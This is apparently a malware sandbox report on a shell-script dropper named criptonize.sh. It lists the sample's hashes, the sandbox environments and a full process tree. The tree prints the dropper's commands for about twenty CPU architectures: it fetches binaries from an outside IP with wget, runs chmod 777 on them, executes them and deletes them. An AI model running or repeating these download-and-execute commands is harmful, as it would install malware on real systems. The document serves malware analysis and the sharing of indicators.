Resubmissions
27-08-2024 23:50
240827-3vw9rsxdrg 827-08-2024 23:49
240827-3t1wkaxdpd 827-08-2024 23:47
240827-3svyxsxdlf 827-08-2024 23:45
240827-3rvlrsxdjc 3Analysis
-
max time kernel
59s -
max time network
61s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mips image:debian9-mipsbe-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
27-08-2024 23:45
Static task
static1
Behavioral task
behavioral1
Sample
criptonize.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
criptonize.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
criptonize.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
criptonize.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
criptonize.sh
-
Size
9KB
-
MD5
fe5b1cae588f9ad418e162262b65b865
-
SHA1
c0ab765270f811bcdbb0ad9f4ed2871edcf58caf
-
SHA256
5231c1a078c018a6abea6fadde67300a961c9b528743464806246a3be619b405
-
SHA512
b9c079cbb03cc31ba0163dbfe3d9a8fda594010717f48d29880496e31b3852fb90423e6291b1697e09c52d72f6bd1f4405021aa63d652a0c96853fff25055774
-
SSDEEP
96:rK7IcSgf29gv+1XVYmm6Wdw9Iu8f/s2CIjTgSWuI:cERlnySeZy
Malware Config
Signatures
-
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description  ioc  Process
File opened for modification  /tmp/criptonize.sh4  wget
File opened for modification  /tmp/criptonize.arc700  wget
File opened for modification  /tmp/criptonize.armv7l  wget
File opened for modification  /tmp/criptonize.powerpc  wget
File opened for modification  /tmp/criptonize.aarch64  wget
File opened for modification  /tmp/criptonize.armv6l  wget
File opened for modification  /tmp/criptonize.armv4l  wget
File opened for modification  /tmp/criptonize.bsdamd64  wget
File opened for modification  /tmp/criptonize.i586  wget
File opened for modification  /tmp/criptonize.i486  wget
File opened for modification  /tmp/criptonize.armv5l  wget
File opened for modification  /tmp/criptonize.armv4eb  wget
File opened for modification  /tmp/criptonize.armv4tl  wget
File opened for modification  /tmp/criptonize.mips64  wget
File opened for modification  /tmp/criptonize.m68k  wget
File opened for modification  /tmp/criptonize.x86_64  wget
File opened for modification  /tmp/criptonize.i686  wget
File opened for modification  /tmp/criptonize.sparc  wget
File opened for modification  /tmp/criptonize.mips  wget
File opened for modification  /tmp/criptonize.mipsel  wget
Processes
-
/tmp/criptonize.sh  /tmp/criptonize.sh  1⤵  PID:722
-
/bin/rm  rm -f criptonize.x86_64  2⤵  PID:723
-
-
/usr/bin/wget  wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64  2⤵
- Writes file to tmp directory
PID:725
-
-
/bin/chmod  chmod 777 criptonize.x86_64  2⤵  PID:827
-
-
/tmp/criptonize.x86_64  ./criptonize.x86_64 x86_64  2⤵  PID:828
-
-
/bin/rm  rm -f criptonize.x86_64  2⤵  PID:830
-
-
/bin/rmrm -f criptonize.i6862⤵PID:831
-
-
/usr/bin/wgetwget -O criptonize.i686 http://212.60.5.174/criptonize.i6862⤵
- Writes file to tmp directory
PID:832
-
-
/bin/chmodchmod 777 criptonize.i6862⤵PID:833
-
-
/tmp/criptonize.i686./criptonize.i686 i6862⤵PID:834
-
-
/bin/rmrm -f criptonize.i6862⤵PID:836
-
-
/bin/rmrm -f criptonize.i5862⤵PID:837
-
-
/usr/bin/wgetwget -O criptonize.i586 http://212.60.5.174/criptonize.i5862⤵
- Writes file to tmp directory
PID:838
-
-
/bin/chmodchmod 777 criptonize.i5862⤵PID:839
-
-
/tmp/criptonize.i586./criptonize.i586 i5862⤵PID:840
-
-
/bin/rmrm -f criptonize.i5862⤵PID:842
-
-
/bin/rmrm -f criptonize.i4862⤵PID:843
-
-
/usr/bin/wgetwget -O criptonize.i486 http://212.60.5.174/criptonize.i4862⤵
- Writes file to tmp directory
PID:844
-
-
/bin/chmodchmod 777 criptonize.i4862⤵PID:845
-
-
/tmp/criptonize.i486./criptonize.i486 i4862⤵PID:846
-
-
/bin/rmrm -f criptonize.i4862⤵PID:848
-
-
/bin/rmrm -f criptonize.aarch642⤵PID:849
-
-
/usr/bin/wgetwget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch642⤵
- Writes file to tmp directory
PID:850
-
-
/bin/chmodchmod 777 criptonize.aarch642⤵PID:851
-
-
/tmp/criptonize.aarch64./criptonize.aarch64 aarch642⤵PID:852
-
-
/bin/rmrm -f criptonize.aarch642⤵PID:854
-
-
/bin/rmrm -f criptonize.armv7l2⤵PID:855
-
-
/usr/bin/wgetwget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l2⤵
- Writes file to tmp directory
PID:856
-
-
/bin/chmodchmod 777 criptonize.armv7l2⤵PID:857
-
-
/tmp/criptonize.armv7l./criptonize.armv7l armv7l2⤵PID:858
-
-
/bin/rmrm -f criptonize.armv7l2⤵PID:860
-
-
/bin/rmrm -f criptonize.armv6l2⤵PID:861
-
-
/usr/bin/wgetwget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l2⤵
- Writes file to tmp directory
PID:862
-
-
/bin/chmodchmod 777 criptonize.armv6l2⤵PID:863
-
-
/tmp/criptonize.armv6l./criptonize.armv6l armv6l2⤵PID:864
-
-
/bin/rmrm -f criptonize.armv6l2⤵PID:866
-
-
/bin/rmrm -f criptonize.armv5l2⤵PID:867
-
-
/usr/bin/wgetwget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l2⤵
- Writes file to tmp directory
PID:868
-
-
/bin/chmodchmod 777 criptonize.armv5l2⤵PID:872
-
-
/tmp/criptonize.armv5l./criptonize.armv5l armv5l2⤵PID:873
-
-
/bin/rmrm -f criptonize.armv5l2⤵PID:875
-
-
/bin/rmrm -f criptonize.armv4eb2⤵PID:876
-
-
/usr/bin/wgetwget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb2⤵
- Writes file to tmp directory
PID:877
-
-
/bin/chmodchmod 777 criptonize.armv4eb2⤵PID:878
-
-
/tmp/criptonize.armv4eb./criptonize.armv4eb armv4eb2⤵PID:879
-
-
/bin/rmrm -f criptonize.armv4eb2⤵PID:881
-
-
/bin/rmrm -f criptonize.armv4tl2⤵PID:882
-
-
/usr/bin/wgetwget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl2⤵
- Writes file to tmp directory
PID:883
-
-
/bin/chmodchmod 777 criptonize.armv4tl2⤵PID:884
-
-
/tmp/criptonize.armv4tl./criptonize.armv4tl armv4tl2⤵PID:885
-
-
/bin/rmrm -f criptonize.armv4tl2⤵PID:887
-
-
/bin/rmrm -f criptonize.armv4l2⤵PID:888
-
-
/usr/bin/wgetwget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l2⤵
- Writes file to tmp directory
PID:889
-
-
/bin/chmodchmod 777 criptonize.armv4l2⤵PID:890
-
-
/tmp/criptonize.armv4l./criptonize.armv4l armv4l2⤵PID:891
-
-
/bin/rmrm -f criptonize.armv4l2⤵PID:893
-
-
/bin/rmrm -f criptonize.mips642⤵PID:894
-
-
/usr/bin/wgetwget -O criptonize.mips64 http://212.60.5.174/criptonize.mips642⤵
- Writes file to tmp directory
PID:895
-
-
/bin/chmodchmod 777 criptonize.mips642⤵PID:896
-
-
/tmp/criptonize.mips64./criptonize.mips64 mips642⤵PID:897
-
-
/bin/rmrm -f criptonize.mips642⤵PID:899
-
-
/bin/rmrm -f criptonize.mips2⤵PID:900
-
-
/usr/bin/wgetwget -O criptonize.mips http://212.60.5.174/criptonize.mips2⤵
- Writes file to tmp directory
PID:901
-
-
/bin/chmodchmod 777 criptonize.mips2⤵PID:902
-
-
/tmp/criptonize.mips./criptonize.mips mips2⤵PID:903
-
-
/bin/rmrm -f criptonize.mips2⤵PID:904
-
-
/bin/rmrm -f criptonize.mipsel2⤵PID:905
-
-
/usr/bin/wgetwget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel2⤵
- Writes file to tmp directory
PID:906
-
-
/bin/chmodchmod 777 criptonize.mipsel2⤵PID:907
-
-
/tmp/criptonize.mipsel./criptonize.mipsel mipsel2⤵PID:908
-
-
/bin/rmrm -f criptonize.mipsel2⤵PID:910
-
-
/bin/rmrm -f criptonize.powerpc2⤵PID:911
-
-
/usr/bin/wgetwget -O criptonize.powerpc http://212.60.5.174/criptonize.powerpc2⤵
- Writes file to tmp directory
PID:912
-
-
/bin/chmodchmod 777 criptonize.powerpc2⤵PID:913
-
-
/tmp/criptonize.powerpc./criptonize.powerpc powerpc2⤵PID:914
-
-
/bin/rmrm -f criptonize.powerpc2⤵PID:916
-
-
/bin/rmrm -f criptonize.m68k2⤵PID:917
-
-
/usr/bin/wgetwget -O criptonize.m68k http://212.60.5.174/criptonize.m68k2⤵
- Writes file to tmp directory
PID:918
-
-
/bin/chmodchmod 777 criptonize.m68k2⤵PID:919
-
-
/tmp/criptonize.m68k./criptonize.m68k m68k2⤵PID:920
-
-
/bin/rmrm -f criptonize.m68k2⤵PID:922
-
-
/bin/rmrm -f criptonize.sh42⤵PID:923
-
-
/usr/bin/wgetwget -O criptonize.sh4 http://212.60.5.174/criptonize.sh42⤵
- Writes file to tmp directory
PID:924
-
-
/bin/chmodchmod 777 criptonize.sh42⤵PID:925
-
-
/tmp/criptonize.sh4./criptonize.sh4 sh42⤵PID:926
-
-
/bin/rmrm -f criptonize.sh42⤵PID:928
-
-
/bin/rmrm -f criptonize.sparc2⤵PID:929
-
-
/usr/bin/wgetwget -O criptonize.sparc http://212.60.5.174/criptonize.sparc2⤵
- Writes file to tmp directory
PID:930
-
-
/bin/chmodchmod 777 criptonize.sparc2⤵PID:931
-
-
/tmp/criptonize.sparc./criptonize.sparc sparc2⤵PID:932
-
-
/bin/rmrm -f criptonize.sparc2⤵PID:934
-
-
/bin/rmrm -f criptonize.arc7002⤵PID:935
-
-
/usr/bin/wgetwget -O criptonize.arc700 http://212.60.5.174/criptonize.arc7002⤵
- Writes file to tmp directory
PID:936
-
-
/bin/chmodchmod 777 criptonize.arc7002⤵PID:937
-
-
/tmp/criptonize.arc700./criptonize.arc700 arc7002⤵PID:938
-
-
/bin/rmrm -f criptonize.arc7002⤵PID:940
-
-
/bin/rmrm -f criptonize.bsdamd642⤵PID:941
-
-
/usr/bin/wgetwget -O criptonize.bsdamd64 http://212.60.5.174/criptonize.bsdamd642⤵
- Writes file to tmp directory
PID:942
-
-
/bin/chmodchmod 777 criptonize.bsdamd642⤵PID:943
-
-
/tmp/criptonize.bsdamd64./criptonize.bsdamd64 bsdamd642⤵PID:944
-
-
/bin/rmrm -f criptonize.bsdamd642⤵PID:946
-